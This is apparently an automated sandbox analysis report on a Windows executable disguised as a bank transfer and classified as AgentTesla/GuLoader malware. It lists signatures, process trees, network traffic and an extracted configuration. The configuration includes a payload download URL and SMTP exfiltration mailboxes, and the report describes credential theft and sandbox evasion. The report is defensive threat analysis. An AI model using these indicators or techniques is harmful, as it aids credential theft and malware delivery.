Play interactive tour

Edit tour

Windows Analysis Report Transferencia_29_11_2021 17.03.39.exe

Overview

General Information

Sample Name:	Transferencia_29_11_2021 17.03.39.exe
Analysis ID:	532136
MD5:	a70cf8fdf5c68e414bad4494a44f272a
SHA1:	4a974930db625492a8aa3f046759db6f3f057129
SHA256:	dd7883497ba8fc4a8fac606d4f3cec70b6d42c0017e320f9becb071d899c6c30
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Hides threads from debuggers

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

Transferencia_29_11_2021 17.03.39.exe (PID: 5360 cmdline: "C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe" MD5: A70CF8FDF5C68E414BAD4494A44F272A)

CasPol.exe (PID: 3940 cmdline: "C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "tamasfulop@csavarcsapagyexpress.huRozsnyoi42mail.csavarcsapagyexpress.hukelvinleelee500@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1V_BC3orZyo_Cje"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000000.107619247628.0000000001390000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 3940	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 3940	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000004.00000000.107619247628.0000000001390000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1V_BC3orZyo_Cje"}
Source: conhost.exe.4876.5.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "tamasfulop@csavarcsapagyexpress.huRozsnyoi42mail.csavarcsapagyexpress.hukelvinleelee500@gmail.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: Transferencia_29_11_2021 17.03.39.exe

Virustotal: Detection: 25%

Perma Link

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01875908 CryptUnprotectData,		4_2_01875908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_018760D8 CryptUnprotectData,		4_2_018760D8

Source: Transferencia_29_11_2021 17.03.39.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.11.20:49811 version: TLS 1.2

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1V_BC3orZyo_Cje

Source: Joe Sandbox View

ASN Name: WEBSUPPORT-SRO-SK-ASSK WEBSUPPORT-SRO-SK-ASSK

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 185.111.89.226 185.111.89.226

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/q217t7l1ccsuj5vlu8k9v7g15blolesf/1638382200000/11612195336931281153/*/1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-6k-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49839 -> 185.111.89.226:587

Source: global traffic

TCP traffic: 192.168.11.20:49839 -> 185.111.89.226:587

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000004.00000002.112540848121.000000001E71E000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112538365456.000000001E2D9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: CasPol.exe, 00000004.00000003.107766671407.0000000001696000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112529238577.000000000167D000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.108700537691.000000000167D000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.107772204438.0000000001690000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000004.00000002.112540848121.000000001E71E000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112538365456.000000001E2D9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CasPol.exe, 00000004.00000002.112540848121.000000001E71E000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112538365456.000000001E2D9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: CasPol.exe, 00000004.00000003.107766671407.0000000001696000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112529238577.000000000167D000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.108700537691.000000000167D000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.107772204438.0000000001690000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000004.00000002.112540848121.000000001E71E000.00000004.00000001.sdmp	String found in binary or memory: http://csavarcsapagyexpress.hu
Source: CasPol.exe, 00000004.00000003.107779643806.000000001E286000.00000004.00000001.sdmp	String found in binary or memory: http://go.micF.
Source: CasPol.exe, 00000004.00000002.112540848121.000000001E71E000.00000004.00000001.sdmp	String found in binary or memory: http://mail.csavarcsapagyexpress.hu
Source: CasPol.exe, 00000004.00000002.112540848121.000000001E71E000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112538365456.000000001E2D9000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	String found in binary or memory: http://rTgNdy.com
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112541174009.000000001E74A000.00000004.00000001.sdmp	String found in binary or memory: http://x7N6F9gC7jnN7HPYuUB7.net
Source: CasPol.exe, 00000004.00000003.107766671407.0000000001696000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.107766583519.0000000001689000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 00000004.00000003.107766671407.0000000001696000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 00000004.00000003.107766671407.0000000001696000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112528985934.0000000001647000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.107772204438.0000000001690000.00000004.00000001.sdmp	String found in binary or memory: https://doc-08-6k-docs.googleusercontent.com/
Source: CasPol.exe, 00000004.00000002.112528985934.0000000001647000.00000004.00000020.sdmp	String found in binary or memory: https://doc-08-6k-docs.googleusercontent.com/F
Source: CasPol.exe, 00000004.00000003.107766671407.0000000001696000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112529238577.000000000167D000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.107766618786.0000000001691000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.107766583519.0000000001689000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.108700537691.000000000167D000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.107772204438.0000000001690000.00000004.00000001.sdmp	String found in binary or memory: https://doc-08-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/q217t7l1
Source: CasPol.exe, 00000004.00000002.112528721290.000000000160B000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000004.00000002.112529856896.0000000001700000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6
Source: CasPol.exe, 00000004.00000002.112540848121.000000001E71E000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112538365456.000000001E2D9000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Transferencia_29_11_2021 17.03.39.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/q217t7l1ccsuj5vlu8k9v7g15blolesf/1638382200000/11612195336931281153/*/1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-6k-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.11.20:49811 version: TLS 1.2

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: Transferencia_29_11_2021 17.03.39.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012AC080	4_2_012AC080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012A4320	4_2_012A4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012ABA48	4_2_012ABA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012A3A50	4_2_012A3A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012A1120	4_2_012A1120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012A3708	4_2_012A3708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012B0890	4_2_012B0890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012B6AC8	4_2_012B6AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_015FA350	4_2_015FA350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_015FBB1B	4_2_015FBB1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_015F57C8	4_2_015F57C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_015F4E60	4_2_015F4E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_015F1D28	4_2_015F1D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_015F41D1	4_2_015F41D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_015F68D8	4_2_015F68D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_015F3330	4_2_015F3330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_018719B0	4_2_018719B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01878320	4_2_01878320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01872B78	4_2_01872B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_0187DEA0	4_2_0187DEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01876D10	4_2_01876D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_0187D120	4_2_0187D120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01871157	4_2_01871157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_0187A4C8	4_2_0187A4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01870040	4_2_01870040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1E3C5E08	4_2_1E3C5E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1E3C46C4	4_2_1E3C46C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1E3C5D41	4_2_1E3C5D41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1E3C6AF1	4_2_1E3C6AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_21576428	4_2_21576428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_21578650	4_2_21578650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_21572D7D	4_2_21572D7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_21570E00	4_2_21570E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_2157A4E8	4_2_2157A4E8

Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797309290.0000000002BD0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameoutrunner.exeFE2XH vs Transferencia_29_11_2021 17.03.39.exe
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameoutrunner.exe vs Transferencia_29_11_2021 17.03.39.exe
Source: Transferencia_29_11_2021 17.03.39.exe	Binary or memory string: OriginalFilenameoutrunner.exe vs Transferencia_29_11_2021 17.03.39.exe

Source: Transferencia_29_11_2021 17.03.39.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: Transferencia_29_11_2021 17.03.39.exe

Static PE information: invalid certificate

Source: Transferencia_29_11_2021 17.03.39.exe

Virustotal: Detection: 25%

Source: Transferencia_29_11_2021 17.03.39.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe "C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe"
Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe

File created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@4/1@3/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000004.00000000.107619247628.0000000001390000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Code function: 2_2_00404857 push cs; ret	2_2_00404858
Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Code function: 2_2_00405D21 push E5BAE958h; ret	2_2_00405D26
Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Code function: 2_2_029D3188 push esi; retf	2_2_029D31BA
Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Code function: 2_2_029D3FBA push ebp; ret	2_2_029D4003
Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Code function: 2_2_029D3FD5 push ebp; ret	2_2_029D4003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012AF465 pushfd ; retf 006Ch	4_2_012AF46A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_018752B8 push esp; ret	4_2_018752F9

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
